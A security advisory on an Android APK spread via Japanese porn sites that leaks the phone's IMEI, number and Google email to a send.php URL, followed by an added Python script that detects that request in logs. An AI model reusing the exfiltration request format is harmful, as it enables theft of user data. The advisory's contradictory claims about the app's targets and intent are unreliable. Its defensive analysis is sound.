Officially, this was the first such case to be found. INCA Internet Security Response Center's Emergency Response Team has detected a malicious file aimed at Japanese users, and we want to share the details.
This malicious application shows the same symptoms as one found earlier in Korea.
Although it does not have a malicious purpose, merely collecting information without the user's consent can be harmful someday.
2. Spreading path and symptoms of infection
No specific damage from this malicious APK file has been reported in Korea; however, it is spreading on Japanese porn sites, and it has been added as a detection pattern to our anti-virus product.
The file is spread through:
- A direct URL link on certain porn sites
- A file disguised as an essential file on the distributor's web site
Clicking the URL on that site downloads the APK file.
Users can download it from a Japanese porn site.
This malicious application requires the following permissions.
After installation, the following launcher icon is created, but it has no name.
Symptoms of infection
After installation, running the malicious application redirects the user to a payment page.
The sequence of malicious behaviors is as follows.
It accesses the porn site at that address and registers a receiver with the following code.
We can check the receiver registration procedure. At this point, the receiver checks for a certain service, and if that service is running, it tries to leak information to an external site.
The following capture shows the dynamic debugging procedure. The information is forwarded to "hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]"
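A defender-side check for the request format shown above, as an added example that is not part of the original advisory: it scans URLs from a proxy or gateway log for the send.php path carrying the a_id, telno, m_addr and usr_id parameters. The sample URLs and host names are constructed, and the Luhn check assumes a_id holds a 15-digit IMEI.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters named in the advisory's forwarding URL.
EXFIL_PARAMS = {"a_id", "telno", "m_addr", "usr_id"}
IMEI_RE = re.compile(r"^\d{15}$")

def luhn_ok(digits):
    """IMEIs end in a Luhn check digit; verifying it cuts false positives."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def classify(url):
    """Return None, or a dict describing how the URL matches the pattern."""
    parts = urlsplit(url)       # also parses defanged hxxp:// URLs
    if not parts.path.endswith("/send.php"):
        return None
    # keep_blank_values: usr_id is sent empty ([NULL]) in the advisory
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not EXFIL_PARAMS.issubset(qs):
        return None
    imei = qs["a_id"][0]
    return {
        "host": parts.hostname,
        "imei_like": bool(IMEI_RE.match(imei)) and luhn_ok(imei),
        "telno_set": bool(qs["telno"][0].strip()),
        "email_like": "@" in qs["m_addr"][0],
    }

def scan(urls):
    """Return (url, details) for every URL that matches the pattern."""
    return [(u, hit) for u in urls if (hit := classify(u))]

# Constructed sample URLs (not taken from the advisory or from real traffic).
SAMPLE_LOG = [
    "http://collector.example/send.php?a_id=490154203237518"
    "&telno=09012345678&m_addr=user%40example.com&usr_id=",
    "http://shop.example/send.php?order=17&item=3",
    "http://news.example/index.php?a_id=1",
]

if __name__ == "__main__":
    for url, hit in scan(SAMPLE_LOG):
        print(hit["host"], hit)
```

Matching on the parameter set rather than the host name keeps the check useful when the host changes.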
3. How to prevent
This malicious application was aimed at Russia and China; however, it is spreading all over the world these days. To use smartphones safely despite the security threats posed by these malicious applications, we recommend that general users follow the "Smartphone security management tips".
INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis and treatment for mobile malicious files such as the one described above through “nProtect Mobile for Android”, and it runs a response system against various security threats.